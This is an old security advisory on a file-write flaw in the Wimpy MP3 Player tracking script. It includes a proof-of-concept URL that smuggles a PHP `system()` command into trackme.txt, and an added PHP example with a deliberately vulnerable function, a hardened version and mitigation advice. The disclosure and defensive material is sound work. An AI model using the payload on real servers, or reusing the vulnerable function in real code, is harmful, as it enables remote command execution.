:: Summary
Vendor : Plaino Inc.
Vendor Site : http://www.wimpyplayer.com/
Product(s) : Wimpy MP3 Player
Version(s) : All
Severity : Low
Impact : trackme.txt overwrite
Release Date : 2/10/2006
Credits : ReZEN (rezen (a) xorcrew (.) net)
=======================================================================================
I. Description
Wimpy provides a simple, clean, enjoyable listening experience for your website's
visitors. Lists and plays an entire directory full of mp3 files automatically.
=======================================================================================
II. Synopsis
The script wimpy_trackplays.php does not validate the variables passed to it (trackFile,
trackArtist, trackTitle) before writing their contents to trackme.txt, so anyone who can
reach the script can write arbitrary text into that file. On its own this is a low-impact
issue for the server running Wimpy: trackme.txt is served as plain text, not executed.
The problem is that a file in the web root whose contents the attacker controls is a
convenient jump-off point for other Remote Command Execution bugs, typically file-inclusion
flaws that read a text file and hand it to the PHP interpreter. Such bugs are quite common,
and because the payload is hosted on the victim's own server instead of one the attacker
controls, Wimpy helps the attacker stay anonymous.
Example (the payload is shown unencoded for readability; in a real request the spaces,
quotes, semicolons and angle brackets have to be URL-encoded):
http://www.site.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays&trackFile=<?php&trackArtist=system("uname -a;id;");&trackTitle=?>
That writes:
<?php
system("uname -a;id;");
?>
to trackme.txt. Then all the attacker has to do is point his file-inclusion / RCE exploit
at trackme.txt and there you have it. So yeah, lame vuln, but interesting. Peace out.
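As an added illustration (this is not Wimpy's code, which the advisory does not reproduce), the PHP below reconstructs the pattern described above: a tracking script that writes request parameters to a text file verbatim, beside a hardened version that allowlists the action, strips control characters and PHP tags and caps field length before writing. The record layout, the sanitising rules and the helper names are assumptions made for the example; only the parameter names come from the URL above.

```php
<?php
// Added example, not code from Wimpy. Simplified reconstruction of the pattern the
// advisory describes: request parameters written verbatim to trackme.txt.
function trackplays_vulnerable(array $get, string $logFile): void
{
    // One value per line, matching the output the advisory shows (assumed format).
    $record = ($get['trackFile'] ?? '') . "\n"
            . ($get['trackArtist'] ?? '') . "\n"
            . ($get['trackTitle'] ?? '') . "\n";
    file_put_contents($logFile, $record, FILE_APPEND | LOCK_EX);
}

// Hardened field cleaner: drop control characters (including CR/LF, so a caller
// cannot forge extra records), neutralise PHP open/close tags, and cap the length.
function sanitize_field(string $value, int $maxLen = 200): string
{
    $clean = preg_replace('/[\x00-\x1F\x7F]/', '', $value);
    $clean = str_replace(['<?', '?>'], ['&lt;?', '?&gt;'], $clean);
    return substr($clean, 0, $maxLen);
}

function trackplays_hardened(array $get, string $logFile): bool
{
    // Only the one action this script supports; anything else is rejected.
    if (($get['myAction'] ?? '') !== 'trackplays') {
        return false;
    }
    $fields = [];
    foreach (['trackFile', 'trackArtist', 'trackTitle'] as $name) {
        $fields[] = sanitize_field((string) ($get[$name] ?? ''));
    }
    // One tab-separated record per line so the log stays parseable.
    $record = implode("\t", $fields) . "\n";
    return file_put_contents($logFile, $record, FILE_APPEND | LOCK_EX) !== false;
}

// Would the PHP interpreter execute anything in this file if a file-inclusion
// bug ever passed it to include()?  Looks for <?, <?php and <?= open tags.
function contains_php_tag(string $logFile): bool
{
    return preg_match('/<\?(php|=)?/i', (string) file_get_contents($logFile)) === 1;
}

// Demonstration with the advisory's payload (constructed input), written to temp files.
$payload = [
    'myAction'    => 'trackplays',
    'trackFile'   => '<?php',
    'trackArtist' => 'system("uname -a;id;");',
    'trackTitle'  => '?>',
];
$vulnLog = tempnam(sys_get_temp_dir(), 'trackme_vuln_');
$safeLog = tempnam(sys_get_temp_dir(), 'trackme_safe_');

trackplays_vulnerable($payload, $vulnLog);
trackplays_hardened($payload, $safeLog);

echo "vulnerable trackme.txt:\n" . file_get_contents($vulnLog);
echo "hardened trackme.txt:\n" . file_get_contents($safeLog);
echo "vulnerable log executes if included: " . (contains_php_tag($vulnLog) ? 'yes' : 'no') . "\n";
echo "hardened log executes if included:   " . (contains_php_tag($safeLog) ? 'yes' : 'no') . "\n";

unlink($vulnLog);
unlink($safeLog);
```

Run it with the PHP CLI; the vulnerable log comes out carrying a live `<?php` tag while the hardened one only contains inert text. Sanitising the fields is defence in depth, not the whole fix: the tracking file should live outside the web root, and the bug that actually gets the attacker code execution is on the include side, so a script must never pass a user-controlled path to include/require.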
=======================================================================================
IV. Greets :>
All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.
=======================================================================================